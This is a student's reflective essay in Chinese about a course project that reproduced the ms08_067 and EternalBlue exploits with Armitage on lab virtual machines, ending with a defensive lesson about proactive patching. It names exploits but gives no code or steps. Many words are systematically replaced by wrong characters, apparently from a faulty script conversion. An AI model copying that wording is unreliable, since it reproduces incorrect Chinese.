本次免考實踐時間跨度極大,從最初接觸Armitage有各類想法到挨個落實再到後期不斷打磨直至最終定稿,前先後後竟有兩個月之久!一路走來,正像劉老師說的那樣,「開心就好」,是的我作到了,整個實踐期間我真的很是開心,真的徹底是靠興趣堅持下來的。不少人老是看我趴在電腦前就來問了,都快考完放假了健哥你咋還在作lyd的實驗,我說你不懂,這是我最快樂的時光。漏洞使人沉醉,一個漏洞的復現可讓我錯過飯點、能夠點燈刷夜,但毫不能夠不把她寫進個人博客中!畢竟,爲了這一份小小的成就感,爲了這一點小小的快樂,值^_^
雖然Hacker隨心所欲,但想要真正成功實施一次入侵仍是很是困難的,受到諸多不可控複雜因素限制,還要考慮清除入侵痕跡。在本身搭的環境中實踐成不成功有時還(shui)得(ping)看(tai)臉(ci),更況且在未知環境中實際應用!還記得第一次漏洞攻擊實驗,從週三開始裝各類虛擬機挨個找漏洞一直弄到週六纔可貴成功第一次攻擊。在作第一個ms08_067漏洞攻擊時,首先是靶機操做系統的選擇上,因爲第一個常用的win7虛擬機已在清明假期被我用騰訊電腦管家打好了補丁極可能沒辦法實施攻擊,所以我先拿PKI實驗課上裝的沒有任何安全防禦的win7客戶機作試驗,發現不行,那就換xp試試唄!而後我便用硬盤裏珍藏多年的xp professional鏡像安裝了一個xp虛擬機,興高采烈地配置好Armitage,一攻擊發現仍是不行!!最後問了不少大佬才知道用英文版的xp能夠成功,但這我仍是攻擊了好幾回的結果……而「永恆之藍」的攻擊更是連xp都不行而只能用PKI的win7虛擬機才能完成……總的來講,漏洞攻擊因「機」而異,尋找漏洞更是徹底取決於Hacker的眼力和本領。網絡攻防其實就是「找漏洞」和「堵漏洞」之間的較量,而所謂「道高一尺魔高一丈」,漏洞攻擊更具備先手優點,未知的敵人永遠在未知的暗處對你發起未知的攻擊。現在,在安全技術已經比較成熟的幾大主流操做系統又在各類知名殺軟的保護加持之下,每每被用戶認爲相對「安全」,但一個新漏洞的發現每每能引發軒然大波,拿到「黑市」中去賣能一晚上暴富;更有甚者如去年不法分子利用NSA武器庫泄漏的危險漏洞「永恆之藍」製做出一款蠕蟲式勒索病毒軟件WannaCry並藉助網絡大範圍傳播,鎖定被感染用戶的系統、加密所有數據並向直接其索取高額比特幣,致使一場全球性互聯網災難!
給咱們的啓示在於,打補丁的方式雖然能夠防範漏洞攻擊,但這畢竟是被動的,是在攻擊發生以後採起的行爲。首先從源頭上來講,操做系統研發者就不該該讓這些攻擊成爲可能,但無奈地球上畢竟不存在完美的程序猿,寫代碼時不免會產生bug。從安全人員的角度來看,要保護一個系統,必須主動一點,像Hacker那樣並搶在Hacker以前對當前系統可能存在的全部漏洞進行檢測,把漏洞堵起來,不安全的因素找出來,各類安全屏障立起來,讓Hacker無機可乘!
最後仍是要感謝一下一路陪我走來的Mac,他的性能足夠強勁以致於讓我能同時開3個虛擬機作滲透測試(>_<)辛苦啦(>_<)
最後的最後感謝一下lyd老師(>_<)此處略去n字節(>_<)